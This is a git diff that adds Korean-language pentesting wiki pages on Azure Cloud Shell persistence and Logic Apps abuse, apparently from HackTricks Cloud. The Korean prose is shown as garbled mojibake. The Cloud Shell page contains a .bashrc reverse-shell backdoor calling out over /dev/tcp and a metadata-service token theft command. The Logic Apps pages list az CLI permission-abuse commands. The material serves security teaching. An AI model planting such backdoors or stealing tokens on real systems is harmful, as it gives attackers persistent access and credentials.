diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index d05776c71..4d0520541 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -409,6 +409,7 @@
- [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md)
- [Az - Automation Accounts](pentesting-cloud/azure-security/az-services/az-automation-accounts.md)
- [Az - Azure App Services](pentesting-cloud/azure-security/az-services/az-app-services.md)
+ - [Az - Cloud Shell](pentesting-cloud/azure-security/az-services/az-cloud-shell.md)
- [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-registry.md)
- [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-instances.md)
- [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB.md)
@@ -452,6 +453,7 @@
- [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md)
- [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md)
- [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md)
+ - [Az - Logic Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md)
- [Az - MySQL](pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md)
- [Az - PostgreSQL](pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md)
- [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md)
@@ -471,6 +473,7 @@
- [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md)
- [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md)
- [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md)
+ - [Az - Logic Apps Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md)
- [Az - MySQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.md)
- [Az - PostgreSQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.md)
- [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md)
@@ -480,6 +483,7 @@
- [Az - SQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md)
- [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md)
- [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md)
+ - [Az - Cloud Shell Persistence](pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md)
- [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md)
- [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md)
- [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md)
diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
new file mode 100644
index 000000000..b5c519428
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
@@ -0,0 +1,56 @@
+# Az - Cloud Shell Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+Learn & practice GCP Hacking:
[**HackTricks Training GCP Red Team Expert (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** ๐ฌ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ๐ฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
+
+## Cloud Shell Persistence
+
+Azure Cloud Shell์ ์ง์์ ์ธ ์ ์ฅ์์ ์๋ ์ธ์ฆ์ ํตํด Azure ๋ฆฌ์์ค๋ฅผ ๊ด๋ฆฌํ ์ ์๋ ๋ช
๋ น์ค ์ก์ธ์ค๋ฅผ ์ ๊ณตํฉ๋๋ค. ๊ณต๊ฒฉ์๋ ์ง์์ ์ธ ํ ๋๋ ํ ๋ฆฌ์ ๋ฐฑ๋์ด๋ฅผ ๋ฐฐ์นํ์ฌ ์ด๋ฅผ ์
์ฉํ ์ ์์ต๋๋ค:
+
+* **์ง์์ ์ธ ์ ์ฅ์**: Azure Cloud Shell์ ํ ๋๋ ํ ๋ฆฌ๋ Azure ํ์ผ ๊ณต์ ์ ๋ง์ดํธ๋๋ฉฐ ์ธ์
์ด ์ข
๋ฃ๋ ํ์๋ ๊ทธ๋๋ก ์ ์ง๋ฉ๋๋ค.
+* **์์ ์คํฌ๋ฆฝํธ**: .bashrc์ ๊ฐ์ ํ์ผ์ ๊ฐ ์ธ์
์์ ์ ์๋์ผ๋ก ์คํ๋์ด ํด๋ผ์ฐ๋ ์
ธ์ด ์์๋ ๋ ์ง์์ ์ธ ์คํ์ ํ์ฉํฉ๋๋ค.
+
+Example backdoor in .bashrc:
+
+{% code overflow="wrap" %}
+```bash
+echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc
+```
+{% endcode %}
+
+์ด ๋ฐฑ๋์ด๋ ์ฌ์ฉ์๊ฐ ํด๋ผ์ฐ๋ ์
ธ์ ์ข
๋ฃํ ํ์๋ 5๋ถ ๋์ ๋ช
๋ น์ ์คํํ ์ ์์ต๋๋ค.
+
+๋ํ Azure์ ๋ฉํ๋ฐ์ดํฐ ์๋น์ค์ ์ฟผ๋ฆฌํ์ฌ ์ธ์คํด์ค ์ธ๋ถ์ ๋ณด ๋ฐ ํ ํฐ์ ๊ฐ์ ธ์ต๋๋ค:
+{% code overflow="wrap" %}
+```bash
+curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s
+```
+{% endcode %}
+
+
+{% hint style="success" %}
+AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
[**HackTricks Training GCP Red Team Expert (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
+
+
+HackTricks ์ง์ํ๊ธฐ
+
+* [**๊ตฌ๋
๊ณํ**](https://github.com/sponsors/carlospolop) ํ์ธํ๊ธฐ!
+* **๐ฌ [**๋์ค์ฝ๋ ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋๋ [**ํ
๋ ๊ทธ๋จ ๊ทธ๋ฃน**](https://t.me/peass)์ ์ฐธ์ฌํ๊ฑฐ๋ **ํธ์ํฐ** ๐ฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**๋ฅผ ํ๋ก์ฐํ์ธ์.**
+* **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.**
+
+
+{% endhint %}
diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md
new file mode 100644
index 000000000..92be9f6f0
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md
@@ -0,0 +1,181 @@
+# Az - Logic Apps Post Exploitation
+
+{% hint style="success" %}
+AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
[**HackTricks Training GCP Red Team Expert (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
+
+
+HackTricks ์ง์ํ๊ธฐ
+
+* [**๊ตฌ๋
๊ณํ**](https://github.com/sponsors/carlospolop) ํ์ธํ๊ธฐ!
+* **๐ฌ [**Discord ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋๋ [**ํ
๋ ๊ทธ๋จ ๊ทธ๋ฃน**](https://t.me/peass)์ ์ฐธ์ฌํ๊ฑฐ๋ **Twitter** ๐ฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**๋ฅผ ํ๋ก์ฐํ์ธ์.**
+* **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํ์ ๊ณต์ ํ์ธ์.**
+
+
+{% endhint %}
+
+## Logic Apps ๋ฐ์ดํฐ๋ฒ ์ด์ค ํฌ์คํธ ์ต์คํ๋ก์ดํ
์ด์
+Logic Apps์ ๋ํ ์์ธํ ์ ๋ณด๋ ๋ค์์ ํ์ธํ์ธ์:
+
+{% content-ref url="../az-services/az-logic-apps.md" %}
+[az-logic-apps.md](../az-services/az-logic-apps.md)
+{% endcontent-ref %}
+
+### "Microsoft.Logic/workflows/read", "Microsoft.Logic/workflows/write" && "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action"
+์ด ๊ถํ์ ์ฌ์ฉํ๋ฉด Logic App ์ํฌํ๋ก๋ฅผ ์์ ํ๊ณ ํด๋น ID๋ฅผ ๊ด๋ฆฌํ ์ ์์ต๋๋ค. ๊ตฌ์ฒด์ ์ผ๋ก, ์์คํ
ํ ๋น ๋ฐ ์ฌ์ฉ์ ํ ๋น ๊ด๋ฆฌ ID๋ฅผ ์ํฌํ๋ก์ ํ ๋นํ๊ฑฐ๋ ์ ๊ฑฐํ ์ ์์ผ๋ฉฐ, ์ด๋ฅผ ํตํด Logic App์ด ๋ช
์์ ์ธ ์๊ฒฉ ์ฆ๋ช
์์ด ๋ค๋ฅธ Azure ๋ฆฌ์์ค์ ์ธ์ฆํ๊ณ ์ ๊ทผํ ์ ์์ต๋๋ค.
+
+{% code overflow="wrap" %}
+```bash
+az logic workflow identity remove/assign \
+--name \
+--resource-group \
+--system-assigned true \
+--user-assigned "/subscriptions//resourceGroups//providers/Microsoft.ManagedIdentity/userAssignedIdentities/"
+```
+{% endcode %}
+
+### "Microsoft.Web/sites/read", "Microsoft.Web/sites/write"
+์ด ๊ถํ์ ์ฌ์ฉํ๋ฉด App Service Plan์ ํธ์คํ
๋ Logic Apps๋ฅผ ์์ฑํ๊ฑฐ๋ ์
๋ฐ์ดํธํ ์ ์์ต๋๋ค. ์ฌ๊ธฐ์๋ HTTPS ๊ฐ์ ์ ์ฉ์ ํ์ฑํํ๊ฑฐ๋ ๋นํ์ฑํํ๋ ๊ฒ๊ณผ ๊ฐ์ ์ค์ ์ ์์ ํ๋ ๊ฒ์ด ํฌํจ๋ฉ๋๋ค.
+
+{% code overflow="wrap" %}
+```bash
+az logicapp update \
+--resource-group \
+--name \
+--set httpsOnly=false
+```
+{% endcode %}
+
+### "Microsoft.Web/sites/stop/action", "Microsoft.Web/sites/start/action" || "Microsoft.Web/sites/restart/action"
+์ด ๊ถํ์ ์ฌ์ฉํ๋ฉด App Service Plan์ ํธ์คํ
๋ Logic Apps๋ฅผ ํฌํจํ์ฌ ์น ์ฑ์ ์์/์ค์ง/์ฌ์์ํ ์ ์์ต๋๋ค. ์ด ์์
์ ์ด์ ์ ์ค์ง๋ ์ฑ์ด ์จ๋ผ์ธ์ผ๋ก ์ ํ๋๊ณ ๊ธฐ๋ฅ์ ์ฌ๊ฐํ๋๋ก ๋ณด์ฅํฉ๋๋ค. ์ด๋ ์ํฌํ๋ก๋ฅผ ๋ฐฉํดํ๊ฑฐ๋ ์๋ํ์ง ์์ ์์
์ ์ ๋ฐํ๊ฑฐ๋ Logic Apps๋ฅผ ์๊ธฐ์น ์๊ฒ ์์, ์ค์ง ๋๋ ์ฌ์์ํ์ฌ ๋ค์ดํ์์ ์ด๋ํ ์ ์์ต๋๋ค.
+
+{% code overflow="wrap" %}
+```bash
+az webapp start/stop/restart \
+--name \
+--resource-group
+```
+{% endcode %}
+
+
+### "Microsoft.Web/sites/config/list/action", "Microsoft.Web/sites/read" && "Microsoft.Web/sites/config/write"
+
+์ด ๊ถํ์ ์ฌ์ฉํ๋ฉด App Service Plan์ ํธ์คํ
๋ Logic Apps๋ฅผ ํฌํจํ ์น ์ฑ์ ์ค์ ์ ๊ตฌ์ฑํ๊ฑฐ๋ ์์ ํ ์ ์์ต๋๋ค. ์ด๋ฅผ ํตํด ์ฑ ์ค์ , ์ฐ๊ฒฐ ๋ฌธ์์ด, ์ธ์ฆ ๊ตฌ์ฑ ๋ฑ์ ๋ณ๊ฒฝํ ์ ์์ต๋๋ค.
+
+{% code overflow="wrap" %}
+```bash
+az logicapp config appsettings set \
+--name \
+--resource-group \
+--settings "="
+```
+{% endcode %}
+
+### "Microsoft.Logic/integrationAccounts/write"
+์ด ๊ถํ์ ์ฌ์ฉํ๋ฉด Azure Logic Apps ํตํฉ ๊ณ์ ์ ์์ฑ, ์
๋ฐ์ดํธ ๋๋ ์ญ์ ํ ์ ์์ต๋๋ค. ์ฌ๊ธฐ์๋ ๋งต, ์คํค๋ง, ํํธ๋, ๊ณ์ฝ ๋ฑ๊ณผ ๊ฐ์ ํตํฉ ๊ณ์ ์์ค์ ๊ตฌ์ฑ์ ๊ด๋ฆฌํ๋ ๊ฒ์ด ํฌํจ๋ฉ๋๋ค.
+
+{% code overflow="wrap" %}
+```bash
+az logic integration-account create \
+--resource-group \
+--name \
+--location \
+--sku \
+--state Enabled
+```
+{% endcode %}
+
+### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/batchConfigurations/write"
+
+์ด ๊ถํ์ ์ฌ์ฉํ๋ฉด Azure Logic Apps ํตํฉ ๊ณ์ ๋ด์์ ๋ฐฐ์น ๊ตฌ์ฑ์ ์์ฑํ๊ฑฐ๋ ์์ ํ ์ ์์ต๋๋ค. ๋ฐฐ์น ๊ตฌ์ฑ์ Logic Apps๊ฐ ๋ฐฐ์น ์ฒ๋ฆฌ๋ฅผ ์ํด ์์ ๋ฉ์์ง๋ฅผ ์ฒ๋ฆฌํ๊ณ ๊ทธ๋ฃนํํ๋ ๋ฐฉ๋ฒ์ ์ ์ํฉ๋๋ค.
+
+{% code overflow="wrap" %}
+```bash
+az logic integration-account batch-configuration create \
+--resource-group \
+--integration-account-name \
+--name \
+--release-criteria '{
+"messageCount": 100,
+"batchSize": 1048576,
+}'
+```
+{% endcode %}
+
+### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/maps/write"
+์ด ๊ถํ์ ์ฌ์ฉํ๋ฉด Azure Logic Apps ํตํฉ ๊ณ์ ๋ด์์ ๋งต์ ์์ฑํ๊ฑฐ๋ ์์ ํ ์ ์์ต๋๋ค. ๋งต์ ๋ฐ์ดํฐ๋ฅผ ํ ํ์์์ ๋ค๋ฅธ ํ์์ผ๋ก ๋ณํํ๋ ๋ฐ ์ฌ์ฉ๋๋ฉฐ, ์๋ก ๋ค๋ฅธ ์์คํ
๊ณผ ์ ํ๋ฆฌ์ผ์ด์
๊ฐ์ ์ํํ ํตํฉ์ ๊ฐ๋ฅํ๊ฒ ํฉ๋๋ค.
+
+{% code overflow="wrap" %}
+```bash
+az logic integration-account map create \
+--resource-group \
+--integration-account-name \
+--name \
+--map-type \
+--content-type application/xml \
+--map-content map-content.xslt
+```
+{% endcode %}
+
+### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/partners/write"
+์ด ๊ถํ์ ์ฌ์ฉํ๋ฉด Azure Logic Apps ํตํฉ ๊ณ์ ์์ ํํธ๋๋ฅผ ์์ฑํ๊ฑฐ๋ ์์ ํ ์ ์์ต๋๋ค. ํํธ๋๋ ๋น์ฆ๋์ค ๊ฐ(B2B) ์ํฌํ๋ก์ ์ฐธ์ฌํ๋ ์ํฐํฐ ๋๋ ์์คํ
์ ๋ํ๋
๋๋ค.
+
+{% code overflow="wrap" %}
+```bash
+az logic integration-account partner create \
+--resource-group \
+--integration-account-name \
+--name \
+--partner-type \
+--content '{
+"b2b": {
+"businessIdentities": [
+{
+"qualifier": "ZZ",
+"value": "TradingPartner1"
+}
+]
+}
+}'
+```
+{% endcode %}
+
+### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/sessions/write"
+์ด ๊ถํ์ ์ฌ์ฉํ๋ฉด Azure Logic Apps ํตํฉ ๊ณ์ ๋ด์์ ์ธ์
์ ์์ฑํ๊ฑฐ๋ ์์ ํ ์ ์์ต๋๋ค. ์ธ์
์ B2B ์ํฌํ๋ก์ฐ์์ ๋ฉ์์ง๋ฅผ ๊ทธ๋ฃนํํ๊ณ ์ ์๋ ๊ธฐ๊ฐ ๋์ ๊ด๋ จ ๊ฑฐ๋๋ฅผ ์ถ์ ํ๋ ๋ฐ ์ฌ์ฉ๋ฉ๋๋ค.
+
+{% code overflow="wrap" %}
+```bash
+az logic integration-account session create \
+--resource-group \
+--integration-account-name \
+--name \
+--content '{
+"properties": {
+"sessionId": "session123",
+"data": {
+"key1": "value1",
+"key2": "value2"
+}
+}
+}'
+```
+{% endcode %}
+
+### "*/delete"
+์ด ๊ถํ์ผ๋ก Azure Logic Apps์ ๊ด๋ จ๋ ๋ฆฌ์์ค๋ฅผ ์ญ์ ํ ์ ์์ต๋๋ค.
+
+{% hint style="success" %}
+AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
[**HackTricks Training GCP Red Team Expert (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
+
+
+HackTricks ์ง์ํ๊ธฐ
+
+* [**๊ตฌ๋
๊ณํ**](https://github.com/sponsors/carlospolop) ํ์ธํ๊ธฐ!
+* **๐ฌ [**Discord ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋๋ [**ํ
๋ ๊ทธ๋จ ๊ทธ๋ฃน**](https://t.me/peass)์ ์ฐธ์ฌํ๊ฑฐ๋ **Twitter** ๐ฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**๋ฅผ ํ๋ก์ฐํ์ธ์.**
+* **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํ์ ๊ณต์ ํ์ธ์.**
+
+
+{% endhint %}
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md
new file mode 100644
index 000000000..9aea2e04f
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md
@@ -0,0 +1,77 @@
+# Az - Logic Apps Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+Learn & practice GCP Hacking:
[**HackTricks Training GCP Red Team Expert (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** ๐ฌ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ๐ฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
+
+## Logic Apps Privesc
+SQL ๋ฐ์ดํฐ๋ฒ ์ด์ค์ ๋ํ ์์ธํ ๋ด์ฉ์ ๋ค์์ ํ์ธํ์ธ์:
+
+{% content-ref url="../az-services/az-logic-apps.md" %}
+[az-logic-apps.md](../az-services/az-logic-apps.md)
+{% endcontent-ref %}
+
+### ("Microsoft.Resources/subscriptions/resourcegroups/read", "Microsoft.Logic/workflows/read", "Microsoft.Logic/workflows/write" && "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action") && ("Microsoft.Logic/workflows/triggers/run/action")
+
+์ด ๊ถํ์ ์ฌ์ฉํ๋ฉด Azure Logic Apps ์ํฌํ๋ก๋ฅผ ์์ฑํ๊ฑฐ๋ ์
๋ฐ์ดํธํ ์ ์์ต๋๋ค. ์ํฌํ๋ก๋ ๋ค์ํ ์์คํ
๋ฐ ์๋น์ค ๊ฐ์ ์๋ํ๋ ํ๋ก์ธ์ค์ ํตํฉ์ ์ ์ํฉ๋๋ค.
+
+{% code overflow="wrap" %}
+```bash
+az logic workflow create \
+--resource-group \
+--name \
+--definition \
+--location
+
+az logic workflow update \
+--name my-new-workflow \
+--resource-group logicappgroup \
+--definition
+```
+{% endcode %}
+
+๋ณ๊ฒฝํ ํ, ๋ค์๊ณผ ๊ฐ์ด ์คํํ ์ ์์ต๋๋ค:
+```bash
+az rest \
+--method post \
+--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/run?api-version=2016-10-01" \
+--body '{}' \
+--headers "Content-Type=application/json"
+```
+### ("Microsoft.Web/sites/read", "Microsoft.Web/sites/basicPublishingCredentialsPolicies/read", "Microsoft.Web/sites/write", "Microsoft.Web/sites/config/list/action") && ("Microsoft.Web/sites/start/action")
+์ด ๊ถํ์ ์ฌ์ฉํ๋ฉด ZIP ํ์ผ ๋ฐฐํฌ๋ฅผ ํตํด Logic App ์ํฌํ๋ก๋ฅผ ๋ฐฐํฌํ ์ ์์ต๋๋ค. ์ด๋ฌํ ๊ถํ์ ์ฑ ์ธ๋ถ์ ๋ณด ์ฝ๊ธฐ, ๊ฒ์ ์๊ฒฉ ์ฆ๋ช
์ก์ธ์ค, ๋ณ๊ฒฝ ์ฌํญ ์์ฑ ๋ฐ ์ฑ ๊ตฌ์ฑ ๋์ด๊ณผ ๊ฐ์ ์์
์ ๊ฐ๋ฅํ๊ฒ ํฉ๋๋ค. ์์ ๊ถํ๊ณผ ํจ๊ป ์ํ๋ ์ฝํ
์ธ ๋ก ์๋ก์ด Logic App์ ์
๋ฐ์ดํธํ๊ณ ๋ฐฐํฌํ ์ ์์ต๋๋ค.
+
+{% code overflow="wrap" %}
+```bash
+az logicapp deployment source config-zip \
+--name \
+--resource-group \
+--src
+```
+{% endcode %}
+
+{% hint style="success" %}
+AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
[**HackTricks Training GCP Red Team Expert (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
+
+
+HackTricks ์ง์ํ๊ธฐ
+
+* [**๊ตฌ๋
๊ณํ**](https://github.com/sponsors/carlospolop) ํ์ธํ๊ธฐ!
+* **๐ฌ [**Discord ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋๋ [**ํ
๋ ๊ทธ๋จ ๊ทธ๋ฃน**](https://t.me/peass)์ ์ฐธ์ฌํ๊ฑฐ๋ **Twitter** ๐ฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**๋ฅผ ํ๋ก์ฐํ์ธ์.**
+* **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.**
+
+
+{% endhint %}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-app-services.md b/src/pentesting-cloud/azure-security/az-services/az-app-services.md
index 794fa07f9..54b2dafb1 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-app-services.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-app-services.md
@@ -44,7 +44,7 @@ Kudu๋ **SCM๊ณผ ์น ๋ฐ API ์ธํฐํ์ด์ค๋ฅผ ๊ด๋ฆฌ**ํ์ฌ App Service๋ฅผ
Kudu๋ App Services์ Function Apps์์ ์ฌ์ฉ๋๋ ๋ฒ์ ์ด ๋ค๋ฅด๋ฉฐ, Function Apps์ ๋ฒ์ ์ ํจ์ฌ ๋ ์ ํ์ ์
๋๋ค.
Kudu์์ ์ฐพ์ ์ ์๋ ๋ช ๊ฐ์ง ํฅ๋ฏธ๋ก์ด ์๋ํฌ์ธํธ๋ ๋ค์๊ณผ ๊ฐ์ต๋๋ค:
-- `/BasicAuth`: Kudu์ **๋ก๊ทธ์ธํ๊ธฐ ์ํด ์ด ๊ฒฝ๋ก์ ์ ๊ทผํด์ผ** ํฉ๋๋ค.
+- `/BasicAuth`: Kudu์ **๋ก๊ทธ์ธํ๊ธฐ ์ํด ์ด ๊ฒฝ๋ก์ ์ ๊ทผํด์ผ ํฉ๋๋ค**.
- `/DebugConsole`: Kudu๊ฐ ์คํ๋๊ณ ์๋ ํ๊ฒฝ์์ ๋ช
๋ น์ ์คํํ ์ ์๋ ์ฝ์์
๋๋ค.
- ์ด ํ๊ฒฝ์ **๋ฉํ๋ฐ์ดํฐ ์๋น์ค์ ์ ๊ทผํ ์ ์์ต๋๋ค**.
- `/webssh/host`: ์ฑ์ด ์คํ๋๊ณ ์๋ ์ปจํ
์ด๋ ๋ด์ ์ฐ๊ฒฐํ ์ ์๋ ์น ๊ธฐ๋ฐ SSH ํด๋ผ์ด์ธํธ์
๋๋ค.
@@ -52,7 +52,7 @@ Kudu์์ ์ฐพ์ ์ ์๋ ๋ช ๊ฐ์ง ํฅ๋ฏธ๋ก์ด ์๋ํฌ์ธํธ๋ ๋ค์
- `/Env`: ์์คํ
, ์ฑ ์ค์ , ํ๊ฒฝ ๋ณ์, ์ฐ๊ฒฐ ๋ฌธ์์ด ๋ฐ HTTP ํค๋์ ๋ํ ์ ๋ณด๋ฅผ ๊ฐ์ ธ์ต๋๋ค.
- `/wwwroot/`: ์น ์ฑ์ ๋ฃจํธ ๋๋ ํ ๋ฆฌ์
๋๋ค. ์ฌ๊ธฐ์์ ๋ชจ๋ ํ์ผ์ ๋ค์ด๋ก๋ํ ์ ์์ต๋๋ค.
-๋ํ, Kudu๋ [https://github.com/projectkudu/kudu](https://github.com/projectkudu/kudu)์์ ์คํ ์์ค์์ผ๋, ํ๋ก์ ํธ๊ฐ ์ค๋จ๋์์ผ๋ฉฐ ํ์ฌ Azure์ Kudu์ ์ด์ Kudu์ ๋์์ ๋น๊ตํ๋ฉด **์ฌ๋ฌ ๊ฐ์ง๊ฐ ์ด๋ฏธ ๋ณ๊ฒฝ๋์์์** ์ ์ ์์ต๋๋ค.
+๋ํ, Kudu๋ [https://github.com/projectkudu/kudu](https://github.com/projectkudu/kudu)์์ ์คํ ์์ค์์ผ๋, ํ๋ก์ ํธ๊ฐ ์ค๋จ๋์์ผ๋ฉฐ ํ์ฌ Azure์ Kudu์ ์ด์ Kudu์ ๋์์ ๋น๊ตํ๋ฉด **์ฌ๋ฌ ๊ฐ์ง๊ฐ ์ด๋ฏธ ๋ณ๊ฒฝ๋์์์ ์ ์ ์์ต๋๋ค**.
## Sources
@@ -72,12 +72,12 @@ App Services๋ ๊ธฐ๋ณธ์ ์ผ๋ก ์ฝ๋๋ฅผ zip ํ์ผ๋ก ์
๋ก๋ํ ์ ์์ง
Azure WebJobs๋ **Azure App Service ํ๊ฒฝ์์ ์คํ๋๋ ๋ฐฑ๊ทธ๋ผ์ด๋ ์์
**์
๋๋ค. ๊ฐ๋ฐ์๊ฐ ์น ์ ํ๋ฆฌ์ผ์ด์
๊ณผ ํจ๊ป ์คํฌ๋ฆฝํธ๋ ํ๋ก๊ทธ๋จ์ ์คํํ ์ ์๋๋ก ํ์ฌ ํ์ผ ์ฒ๋ฆฌ, ๋ฐ์ดํฐ ์ฒ๋ฆฌ ๋๋ ์์ฝ๋ ์์
๊ณผ ๊ฐ์ ๋น๋๊ธฐ ๋๋ ์๊ฐ ์ง์ฝ์ ์ธ ์์
์ ๋ ์ฝ๊ฒ ์ฒ๋ฆฌํ ์ ์๊ฒ ํฉ๋๋ค.
